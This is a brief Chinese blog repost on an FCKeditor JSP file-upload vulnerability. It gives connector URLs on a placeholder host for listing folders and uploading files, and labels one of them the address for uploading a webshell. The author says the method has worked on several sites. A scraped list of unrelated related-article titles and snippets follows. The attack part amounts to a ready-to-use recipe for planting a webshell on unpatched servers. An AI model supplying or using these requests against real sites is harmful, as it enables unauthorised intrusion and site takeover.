http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

上传shell的地址:

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

跟版本有关系.并不是百分百成功. 测试成功几个站.

转载于:https://blog.51cto.com/obnus/472619

FCKeditor的JSP版漏洞相关推荐

  1. FCKEditor最新上传漏洞(ASP),允许上传“.asp;jpg”类型文件解决方案

    近期公司大量网站受到***,造成很的损失.经过反复分析,发现原来是FCKEditor存在上传漏洞.这里,我针对此上传漏洞进行了修正,具体情况请见以下分析: ***表现: 接收上传的目录,发现有以&qu ...

  2. jsp在线编辑html,FCK,JSP版html在线编辑器【收藏】

    转自:http://sooxin.javaeye.com/blog/224535 Fckedit编辑器一款支持多种语言的html编辑器,在它的JSP版一直没有完整的示例. 故此,我们整理了这版,以使大 ...

  3. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  4. ueditor1.4.3 jsp版在ssh下的配置

    2019独角兽企业重金招聘Python工程师标准>>> 对于ueditor就不介绍了,网上一大把,直接言归正传,其主要问题是图片等的上传. 开发环境: myeclipse2014+t ...

  5. 在线jsp版泰囧表情的生成器代码,不用PS也能恶搞。

    转载请注明出处:在线jsp版泰囧表情的生成器代码,不用PS也能恶搞. 代码下载地址:http://www.zuidaima.com/share/1687663042939904.htm 以前分享过ja ...

  6. JSP版俄罗斯发方块+用户积分排行榜

    一.游戏截图 二.查看所有成绩 三.技术原理: 学习过程是循序渐进的: 1.俄罗斯方块第1版:能移动,能接收按键,刷新画面. https://blog.csdn.net/weixin_42644456 ...

  7. 线jsp版泰囧表情的生成器代码,不用PS也能恶搞。

    原文:在线jsp版泰囧表情的生成器代码,不用PS也能恶搞. 源代码下载地址:hhttp://www.zuidaima.com/share/1687663042939904.htm 以前分享过java实 ...

  8. android 支付吧 漏洞,趋势科技发现支付宝安卓版漏洞

    趋势科技发现支付宝安卓版漏洞 2014-08-25 11:57:58 阅读:0次 最近,趋势科技发现支付宝Android应用程序上有两个漏洞,可被攻击者用来进行网络钓鱼(Phishing)攻击以窃取支 ...

  9. fckeditor的jsp中的使用

    开发环境:  Tomcat6.0 MyEclipse 5.1.1 c 版本 FCKeditor_2.5 FCKeditor.Java 2.3 下载地址: http://www.fckeditor.ne ...

  10. 测试新版FCKeditor编辑器精简版

    来自:http://www.sablog.net/blog/archives/284/ 基于最新的fckeditor 2.4.2精简和优化.这次没有走极端.在保证速度的情况下.保留了大多数常用功能. ...

最新文章

  1. 聊聊flink的CsvTableSink
  2. 正则表达式只能写数字_正则表达式真的很骚,可惜你不会写
  3. apache druid 与kafka整合使用
  4. Docker修改容器系统时间命令组
  5. Developer's Guide to Microsoft Enterprise Library, C# Edition
  6. 计算机课程设计评分表,课程设计的评分标准.doc
  7. 6425C-Lab5 管理计算机帐户
  8. oracle函数调用语法,simpleJdbcCall调用函数语法
  9. 电信机顶盒,废弃机顶盒复活,华为电信定制机顶盒,固件。设置关闭限制apk选项。安装自己所需的apk软件。
  10. 城市大脑已经几岁?城市大脑发展成熟度的年龄评估模型
  11. 谷歌个性化地图瓦片_对Google广告个性化的调查
  12. EDI 单据和标准是什么?
  13. 基于Javafx制作的随机抽签软件
  14. matlab 7.0 win8,Win8.1系统中matlab7.0不兼容的解决方法
  15. 左手指令_屈老师大班科学教案:猜左手猜右手
  16. 思科WLC与AP无法正常Join
  17. mysql5.7 报错1055_MySql5.7 报错 1055
  18. AT24C256读取数据
  19. 十二、偏向锁、轻量级锁、重量级锁,锁的膨胀过程
  20. 浏览器内核之渲染基础

热门文章

  1. 利用PowerShell复制SQLServer账户的所有权限
  2. fir.im Weekly - 如何打造真正的工程师文化
  3. 微软 Windows 10 将支持 8 英寸以下 ARM 平板设备
  4. csdn肿么了,这两天写的博文都是待审核
  5. java 利用Scanner解析逗号字符串
  6. [C++] socket - 2 [UDP通信C/S实例]
  7. RedHat 5.6_x86_64 + ASM + RAW+ Oracle 10g RAC (二)
  8. 来自糯大米童鞋的 纯 golang 的 mp4 读写库。
  9. vmware+player+12+linux,Vmware player 12
  10. 把一个人的特点写具体作文_把一个人的特点写具体作文450字